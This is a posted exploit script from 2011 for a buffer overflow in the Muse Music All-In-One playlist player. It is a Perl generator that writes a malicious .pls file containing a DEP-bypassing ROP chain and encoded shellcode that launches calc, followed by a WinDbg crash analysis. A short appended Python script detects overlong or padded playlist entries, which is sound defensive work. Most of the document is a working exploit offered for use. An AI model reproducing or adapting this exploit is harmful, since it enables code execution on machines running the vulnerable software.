
Muse Music All-In-One PLS Buffer Overflow

Posted on 27 September 2011

#!/usr/bin/perl
#
#[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit (DEP Bypass)
#[+]Date: 25\9\2011 (DD\MM\YYYY)
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html
#[+]Version: 1.5.0.001
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#[+]Info:
#This exploit may be universal if the offset at which EIP is overwritten is the same on all Windows systems. ;)
#To reproduce, click File -> Open..., select Exploit.pls and watch calc appear.
#

use strict;
use warnings;

print q{
Created By C4SS!0 G0M3S
E-mail netfuzzer@hotmail.com
Blog net-fuzzer.blogspot.com
};

print "\n[+]Creating Exploit File...\n";
sleep(2);

##########################ROP START HERE###############################################
my $rop = pack('V',0x0043bc93);  # POP EAX # RETN
$rop .= "AAAA" x 4;              # JUNK
$rop .= pack('V',0x00339014);    # PTR to a Call DWORD for LoadLibraryA
$rop .= pack('V',0x1002042f);    # POP EBP # RETN
$rop .= pack('V',0x0044387e);    # ADD ESP,40 # RETN == Return of LoadLibraryA
$rop .= pack('V',0x100255d1);    # POP ESI # RETN
$rop .= pack('V',0x003367C1);    # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA
$rop .= pack('V',0x004a296b);    # POP EDI # RETN
$rop .= pack('V',0x004a296c);    # RETN
$rop .= pack('V',0x004b0519);    # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 35;                # JUNK
#############################Call GetProcAddress###################################
$rop .= pack('V',0x004b2507);    # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004a296b);    # POP EDI # RETN
$rop .= pack('V',0x003367C1);    # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x100255d1);    # POP ESI # RETN
$rop .= pack('V',0x0044387e);    # ADD ESP,40 # RETN == Return of GetProcAddress
$rop .= pack('V',0x004b2507);    # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004b9563);    # XCHG EAX,EBP # RETN
$rop .= pack('V',0x0043bc93);    # POP EAX # RETN
$rop .= pack('V',0x00339010);    # PTR to GetProcAddress
$rop .= pack('V',0x004a296b);    # POP EDI # RETN
$rop .= pack('V',0x003367C1);    # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x004b0519);    # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "A" x 33;                # JUNK
#############################Call VirtualProtect####################################
$rop .= pack('V',0x004b2507);    # XCHG EAX,EBX # RETN
$rop .= pack('V',0x00432a42);    # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08
$rop .= "VVVV";                  # JUNK
$rop .= pack('V',0x004a296c) x 3; # RETN
$rop .= pack('V',0x10018000);    # XOR EAX,EAX # RETN
$rop .= pack('V',0x0043bc93);    # POP EAX # RETN
$rop .= pack('V',0x00000040);    # Value of flNewProtect
$rop .= pack('V',0x00478695);    # XCHG EAX,EDX # RETN
$rop .= pack('V',0x10018000);    # XOR EAX,EAX # RETN
$rop .= pack('V',0x1001433f);    # ADD EAX,EDI # POP EDI # POP ESI # RETN
$rop .= "A" x 8;                 # JUNK
$rop .= pack('V',0x1002028b);    # POP ECX # RETN
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x1000B6ED);    # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN
$rop .= pack('V',0x004b2507);    # XCHG EAX,EBX # RETN
$rop .= pack('V',0x1002042f);    # POP EBP # RETN
$rop .= pack('V',0x10012107);    # PUSH ESP # RETN == Return of VirtualProtect
$rop .= pack('V',0x004a05b8);    # POP EBX # RETN
$rop .= pack('V',0x00000500);    # Value of dwSize
$rop .= pack('V',0x004b2c56);    # XCHG EAX,ESI # RETN
$rop .= pack('V',0x004a296b);    # POP EDI # RETN
$rop .= pack('V',0x004a296c);    # RETN
$rop .= pack('V',0x004b0519);    # PUSHAD # RETN
##########################ROP END HERE#################################################

# Shellcode: WinExec "Calc.exe"
# Bad chars: "\x00\x20\x3d\x0a\x0d\xff"
my $shellcode =
"\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" .
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" .
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
"\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";

my $buf = "A" x 1300;
$buf .= $rop;
$buf .= "\x90" x 10;
$buf .= $shellcode;
$buf .= "A" x 2000;

open(my $file, ">Exploit.pls") or die "[-]Error: $!\n";
print $file $buf;
close $file;
print "\n[+]File Exploit.pls Created Successfully.\n";
sleep(1);

=head

(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0
eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
msvcrt!wscanf+0x2343:
77c24609 8806            mov     byte ptr [esi],al          ds:0023:00130000=41
0:000> .exr -1
ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00130000
Attempt to write to address 00130000
0:000> .lastevent
Last event: 8f4.8f8: Access violation - code c0000005 (first chance)
  debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00)
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec34 77c212df msvcrt!wscanf+0x2343
*** WARNING: Unable to verify checksum for Muse.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Muse.exe -
0012ec70 00498d3a msvcrt!fscanf+0x28
0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa
0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c
00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2
0:000> g
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012e64c ebp=0012e66c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
0:000> !load winext/msec.dll
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x41414141
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Exception Hash (Major/Minor): 0x71174239.0x2a6b1069

Stack Trace:
Unknown
ntdll!RtlConvertUlongToLargeInteger+0x6a
ntdll!RtlConvertUlongToLargeInteger+0x3c
ntdll!KiUserExceptionDispatcher+0xe
msvcrt!fscanf+0x28
Muse!CSdll::operator=+0x974fa
ntdll!RtlpUnWaitCriticalSection+0x86c
ntdll!RtlpUnWaitCriticalSection+0x7f2
Instruction Address: 0x0000000041414141

Description: Read Access Violation at the Instruction Pointer
Short Description: ReadAVonIP
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069)

Access violations at the instruction pointer are exploitable if not near NULL.

=cut
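The debugger log above faults inside msvcrt!fscanf, called from Muse.exe, while it copies a PLS entry value that is far longer than any real playlist path. As an added defender-side example that is not part of the original exploit, the Python below triages .pls files for the shape of input behind this class of bug: a value over an assumed 1024-byte limit, non-printable bytes where a path or title belongs, or a long run of a single filler byte. The thresholds and both sample playlists are constructed for this example.

```python
"""Triage .pls playlists for overlong, binary-laden or filler-padded values.
Thresholds are assumptions, not values from the advisory; both sample
playlists below are constructed for this example."""
import re
import string

MAX_VALUE_LEN = 1024                      # assumed: no real path/title is longer
FILLER_RUN = re.compile(rb"(.)\1{255,}")  # 256+ repeats of one byte, e.g. "A" x 1300
PRINTABLE = frozenset(string.printable.encode("ascii"))


def triage_pls(data: bytes) -> list:
    """Return human-readable findings for one PLS body; an empty list means clean."""
    findings = []
    lines = data.replace(b"\r\n", b"\n").split(b"\n")
    if not lines or lines[0].strip().lower() != b"[playlist]":
        findings.append("missing [playlist] header")
    for n, line in enumerate(lines[1:], start=2):
        if not line.strip() or line.startswith(b";"):
            continue                                    # blank or comment line
        key, sep, value = line.partition(b"=")
        name = key.decode("ascii", errors="replace")
        if not sep:
            findings.append(f"line {n}: no key=value separator")
            continue
        if len(value) > MAX_VALUE_LEN:
            findings.append(f"line {n}: {name} value is {len(value)} bytes")
        binary = sum(1 for b in value if b not in PRINTABLE)
        if binary:
            findings.append(f"line {n}: {name} holds {binary} non-printable bytes")
        run = FILLER_RUN.search(value)
        if run:
            findings.append(f"line {n}: {name} has a run of {len(run.group(0))} x {run.group(1)!r}")
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(triage_pls(data))


# Constructed samples: an ordinary playlist, and one whose File1 entry is shaped
# like the exploit's (1300 filler bytes followed by high-bit bytes).
BENIGN = (b"[playlist]\r\nFile1=C:\\Music\\track01.mp3\r\nTitle1=Track 1\r\n"
          b"Length1=213\r\nNumberOfEntries=1\r\nVersion=2\r\n")
HOSTILE = (b"[playlist]\r\nFile1=" + b"A" * 1300 + bytes(range(0x80, 0x90)) +
           b"\r\nNumberOfEntries=1\r\n")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(label, "->", triage_pls(blob) or "clean")
```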